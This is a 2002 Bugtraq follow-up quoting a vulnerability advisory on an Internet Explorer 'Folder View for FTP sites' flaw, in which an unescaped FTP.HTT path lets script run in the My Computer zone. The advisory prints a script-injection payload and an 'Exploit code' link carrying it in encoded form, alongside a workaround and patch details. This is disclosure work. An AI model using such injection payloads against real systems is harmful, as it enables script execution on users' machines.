Bugtraq mailing list archives
Re: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability
From: "Eiji James Yoshida" <ptrs-ejy () bp iij4u or jp>
Date: Sun, 4 Aug 2002 01:44:25 +0900
This problem (BugtraqID:4954) was corrected in Windows 2000 Service Pack 3. Windows2000 SP3 (Q316890) http://support.microsoft.com/default.aspx?scid=kb;en-us;q316890 Regards, ------------------------------------------------------ Eiji "James" Yoshida penetration technique research site E-mail: zaddik () geocities co jp URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm ------------------------------------------------------ ----- Original Message ----- From: "Eiji James Yoshida" <ptrs-ejy () bp iij4u or jp> To: <bugtraq () securityfocus com> Sent: Friday, June 07, 2002 12:33 AM Subject: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 + Title: ~~~~~~~~~~~~~~~~~ Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability + Date: ~~~~~~~~~~~~~~~~~ 7 June 2002 + Author: ~~~~~~~~~~~~~~~~~ Eiji James Yoshida [zaddik () geocities co jp] + Risk: ~~~~~~~~~~~~~~~~~ Medium + Vulnerable: ~~~~~~~~~~~~~~~~~ Windows2000 SP2 IE5.5SP1 Windows2000 SP2 IE5.5SP2 Windows2000 SP2 IE6.0 + Overview: ~~~~~~~~~~~~~~~~~ IE allows running Malicious Scripts due to a bug in 'folder View for FTP sites'. If you enable both an 'Enable folder view for FTP sites' IE Advanced Setting and an 'Enable Web content in folders' Explorer Folder Option, the script embedded in FTP Server Address will run. (Both options are set to 'Enable' by default.) * It's important that the script runs in the My Computer zone! + Details: ~~~~~~~~~~~~~~~~~ The problem is in FTP.HTT invoked by the 'folder view for FTP sites' feature. ( %SystemRoot%\WEB\FTP.HTT ) - --------------------FTP.HTT-------------------- 35: <BASE href="%THISDIRPATH%\"> - ----------------------------------------------- This '%THISDIRPATH%' is not escaped. (Example 1) [ ftp://TARGET ] '%THISDIRPATH%' = 'ftp://TARGET/' <BASE href="ftp://TARGET/\"> ~~~~~~~~~~~~~ (Example 2) [ ftp://"><script>alert("Exploit");</script> ] '%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/' <BASE href="ftp://"><script>alert("Exploit");</script>/\"> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + Exploit code: ~~~~~~~~~~~~~~~~~ <a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a> + Demonstration: ~~~~~~~~~~~~~~~~~ http://www.geocities.co.jp/SiliconValley/1667/advisory02e.html + Workaround: ~~~~~~~~~~~~~~~~~ Disable either 'Enable folder view for FTP sites' IE Advanced Setting or 'Enable Web content in folders' Explorer Folder Option. + Vendor status: ~~~~~~~~~~~~~~~~~ Microsoft was notified on 21 December 2001. - ---------------------------------------------------------------------- Eiji "James" Yoshida penetration technique research site E-mail: zaddik () geocities co jp URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm - ---------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8ckt Comment: Eiji James Yoshida iQA/AwUBPP93/TnqpMRtMot1EQJE+gCg3tezyI7XyhSatXTXkjuwTqkiuroAoOkA 55mgpZ0K8d9mx/c0pS2Knqoe =PTNT -----END PGP SIGNATURE-----
Current thread:
- Re: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability Eiji James Yoshida (Aug 03)